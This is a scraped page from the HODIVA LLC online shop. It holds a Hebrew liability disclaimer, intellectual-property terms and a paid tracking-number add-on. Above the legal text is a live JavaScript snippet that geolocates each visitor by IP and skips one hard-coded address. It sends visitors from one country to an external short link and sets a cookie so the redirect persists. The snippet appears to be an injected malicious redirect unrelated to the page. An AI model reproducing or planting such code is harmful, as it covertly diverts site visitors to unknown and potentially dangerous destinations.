function createCookie(name, value, days) { var date, expires; if (days) { date = new Date(); date.setTime(date.getTime()+(days*24*60*60*1000)); expires = "; expires="+date.toUTCString(); } else { expires = ""; } document.cookie = name+"="+value+expires+"; path=/"; } function getCookie(cname) { var name = cname + "="; var decodedCookie = decodeURIComponent(document.cookie); var ca = decodedCookie.split(';'); for(var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') { c = c.substring(1); } if (c.indexOf(name) == 0) { return c.substring(name.length, c.length); } } return ""; } if (getCookie('ipapi') != 'skip'){ if (getCookie('ipapi') == 'redirect'){ window.location.href = "https://lp.vp4.me/g9ex"; }else{ jQuery.ajax({ url: "https://api.ipify.org/?format=json", async:false, success: function(e) {if (e.ip == '68.129.215.245'){ createCookie('ipapi', 'skip', 32); return true;}jQuery.ajax({ url: "https://ipapi.co/country/", async:false, success: function(data) { if (data == 'CG'){ createCookie('ipapi', 'redirect', 32); window.location.href = "https://lp.vp4.me/g9ex"; }else{ createCookie('ipapi', 'skip', 32); return true; } }, error: function () { createCookie('ipapi', 'skip', 32); return true; } }); }, error: function () { createCookie('ipapi', 'skip', 32); return true; } }); } }

הגבלת אחריות


הגבלת אחריות

  1. הגבלים

1.1.       HODIVA LLC אינה אחראית ולא תהיה אחראית או תישא בכל נזק ישיר או עקיף שיגרם למזמינה או למשתמשת אחרת של האתר או לכל צד שלישי, כתוצאה משימוש או רכישה באתר, שלא על פי תקנון זה.  בכל טענה של צד כזה, כגון נזק כספי, הפסד הכנסה או מניעת רווח, מניעת גישה וכו', HODIVA LLC תהיה רשאית לבטל את ההזמנה הנוגעת לעניין זה.

1.2.       HODIVA LLC אינה אחראית ולא תהיה אחראית, לכל טעות שנפלה בתיאור המוצרים באתר.

1.3.       HODIVA LLC אינה אחראית ולא תהיה אחראית, לכל הבדל שיהיה בין תמונות המוצרים באתר אשר נועדו להמחשה בלבד לבין המוצרים הנמכרים אשר יסופקו למזמינה. יודגש, כי HODIVA LLC עושה כל שביכולתה לצורך ווידוא זהות בין התמונות המופיעות באתר לתיאור המוצרים לבין המוצרים הנמכרים.

1.4.       HODIVA LLC אינה אחראית ולא תהיה אחראית, לכל שימוש שתעשה המזמינה או הנמענת שלא בהתאם להוראות היצרן או HODIVA LLC

1.5       בכל מקרה, HODIVA LLC לא תישא באחריות כלשהי אשר עולה על ערך המוצר הרלוונטי שנרכש, ובוודאי שלא תהיה אחראית בכל נזק שאינו ישיר או נזק תוצאתי.

1.6.       HODIVA LLC אינה אחראית ולא תהיה אחראית, לעיכובים באספקת המוצרים כתוצאה מאירועים שאינם בשליטתה הישירה. כך למשל, HODIVA LLC לא תהיה אחראית במקרה של שביתות, אסונות טבע, תקלות במערכת המחשוב, תקלות במערכות הטלפונים או תקלות בשירות הדואר האלקטרוני, אשר יש בהם כדי לפגוע בהשלמת הרכישה והאספקה למזמינה או לנמענת.

1.7.       HODIVA LLC מתחייבת כי תעשה כמיטב יכולתה לספק את המוצרים במועד המבוקש. במידה והמזמינה סבורה כי המוצרים שרכשה באתר או שירותים שקיבלה לוקים בפגם, היא מוזמנת לפנות באופן מיידי לשירות הלקוחות של האתר באמצעות המייל: info@hodiva.com, ופנייתה תענה בהקדם.

1.8.  כל הזמנה מהאתר, לרבות הזמנת מוצרים פיזיים ו/או שירותים מאתר HODIVA.com ו/או מאתרים אחרים באמצעות שירות הקניינות האישית, הינם עבור שימוש עצמי בלבד ואינם עבור שימוש מסחרי. כל עסקה אשר מבוצעת באמצעות האתר הנה עסקת יבוא אישי ולא יבוא מסחרי. לעניין יבוא אישי הפרטים אשר יוזנו בפרטי המשלוח הם אלה שקובעים את זהות היבואן. HODIVA LLC לא תהא אחראית לכל עיכוב ו/או עיצום כספי ו/או אי שיחרור ו/או כל טענה אחרת שיש למזמינה/ליבואן מול רשויות המס במדינתו כתוצאה מרכישה מהאתר ו/או באמצעות האתר.

  1. זכויות יוצרים

2.1.       כל זכויות הקניין הרוחני באתר, לרבות הפטנטים, זכויות היוצרים, העיצובים, השיטות והסודות המסחריים, הנם רכושה של HODIVA LLC. זכויות אלה חלות, בין היתר, על עיצובו הגרפי של האתר, בסיסי הנתונים בו (לרבות רשימות המוצרים, תיאור המוצרים וכד'), קוד המחשב של האתר וכל פרט אחר הקשור בהפעלתו.

2.2.       השם "הודיווה" בעברית ו-"hodiva" באנגלית, וכן כל שילוב הדומה להם או המכיל אחד מהם במלואו או חלק מהם, שם המתחם (domain name) של האתר, סימני המסחר של HODIVA LLC, בין אם רשומים ובין אם לא, רשימת המוצרים, תיאור המוצרים, הם רכושה הבלעדי של HODIVA LLC על כן, אין לעשות בהם כל שימוש בלא קבלת הסכמתה בכתב ומראש של HODIVA LLC

2.3.       אין להעתיק, לשכפל, להפיץ, למכור, לשווק ולתרגם מידע כלשהו מן האתר (לרבות סימני מסחר, תמונות, עיצובים, טקסטים וקוד-מחשב) בלא קבלת רשותה המפורשת של HODIVA LLC מראש ובכתב.          

2.4.       אין לעשות כל שימוש מסחרי בנתונים המתפרסמים באתר, בבסיס הנתונים, ברשימות המוצרים המופיעים בו או בפרטים אחרים המתפרסמים באתר בלא קבלת הסכמתה של HODIVA LLC מראש ובכתב.

2.5.       אין להשתמש בנתונים כלשהם המתפרסמים באתר לצורך הצגתם באתר אינטרנט או בשירות אחר כלשהו, בלא לקבל את הסכמתה של HODIVA LLC מראש ובכתב ובכפוף לתנאי אותה הסכמה, במידה ותינתן.

2.6.       אין להציג את האתר בתוך מסגרת (Frame) גלויה או סמויה.

2.7.       אין להציג את האתר בעיצוב או ממשק גרפי שונים מאלה שעיצבה לו HODIVA LLC, אלא בכפוף לקבלת הסכמתה לכך מראש ובכתב.      

2.8.       ככל שיש באתר סימני מסחר ומידע, לרבות תמונות, שרטוטים וכו', שנמסרו לפרסום  מוצרים למכירה באתר, כי אז סימני מסחר ומידע זה הוא רכושן של אותן חברות ואין להשתמש בסימני מסחר ומידע זה בלא הסכמתן.

  1. אחריות מוצרים

אחריות

3.1.החברה ו/או הנהלת האתר ו/או מי מטעמם לא יהיו אחראים ולא ישאו בכל נזק ישיר, עקיף, תוצאתי או מיוחד, שיגרם למשתמשת ו/או לגולשת ו/או למזמינה ו/או לצד שלישי, כתוצאה משימוש או רכישה באמצעות האתר, שלא על פי תקנון זה - תהא עילת התביעה אשר תהא - לרבות הפסד הכנסה ו/או מניעת רווח שיגרמו מכל סיבה שהיא, שאז HODIVA LLC שומרת לעצמה לבטל את ההזמנה הספציפית.

3.2.נפלה טעות קולמוס בתיאור המוצר, לא יחייב הדבר את HODIVA LLC ו/או את הנהלת האתר.

3.3.תמונות המוצרים באתר נועדו להמחשה בלבד וייתכנו הבדלים בין התמונות המוצגות באתר, חלקן או כולן, לבין המוצרים הנמכרים בפועל.

3.4.בכל מקרה לא תישא HODIVA LLC באחריות כלשהי העולה על ערך המוצר הנרכש וכן בכל נזק שאינו ישיר ו/או נזק תוצאתי.

3.5. HODIVA LLC אינה אחראית לשימוש שתעשה המזמינה ו/או צד שלישי שלא בהתאם להוראות היצרן ו/או HODIVA LLC במוצר.

קראי גם:

תקנון שימוש באתר

מדיניות פרטיות

מדיניות ביטולים והחזרות


חזרה למעלה

מומלץ בחום!

הוסיפי שקט נפשי לסל הקניות ודעי בכל רגע היכן נמצאת החבילה שלך.

תוספת עבור מספר מעקב HODIVA LUX HODIVA SHOP HODIVA ACTIVE
$3.59